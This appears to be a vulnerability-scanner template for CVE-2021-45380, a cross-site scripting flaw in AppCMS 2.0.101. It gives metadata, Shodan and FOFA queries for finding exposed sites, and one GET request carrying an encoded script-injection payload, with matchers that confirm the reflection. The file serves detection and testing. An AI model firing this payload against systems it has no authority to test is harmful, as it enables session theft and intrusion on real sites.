id: CVE-2021-45380 info: name: AppCMS - Cross-Site Scripting author: pikpikcu severity: medium description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/source-trace/appcms/issues/8 - https://nvd.nist.gov/vuln/detail/CVE-2021-45380 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-45380 cwe-id: CWE-79 epss-score: 0.00314 epss-percentile: 0.70155 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 vendor: appcms product: appcms shodan-query: - http.html:"Powerd by AppCMS" - http.html:"powerd by appcms" fofa-query: body="powerd by appcms" tags: cve2021,cve,appcms,xss http: - method: GET path: - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - '"">' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022024384de6b0a93a051de72f068095500e01f5bf0fd5d96183c75e1ade1adb1730022100f6a242764334999f7835ead6985abcf58b92a4c28cfcc89f243145506f884932:922c64590222798bb761d5b6d8e72950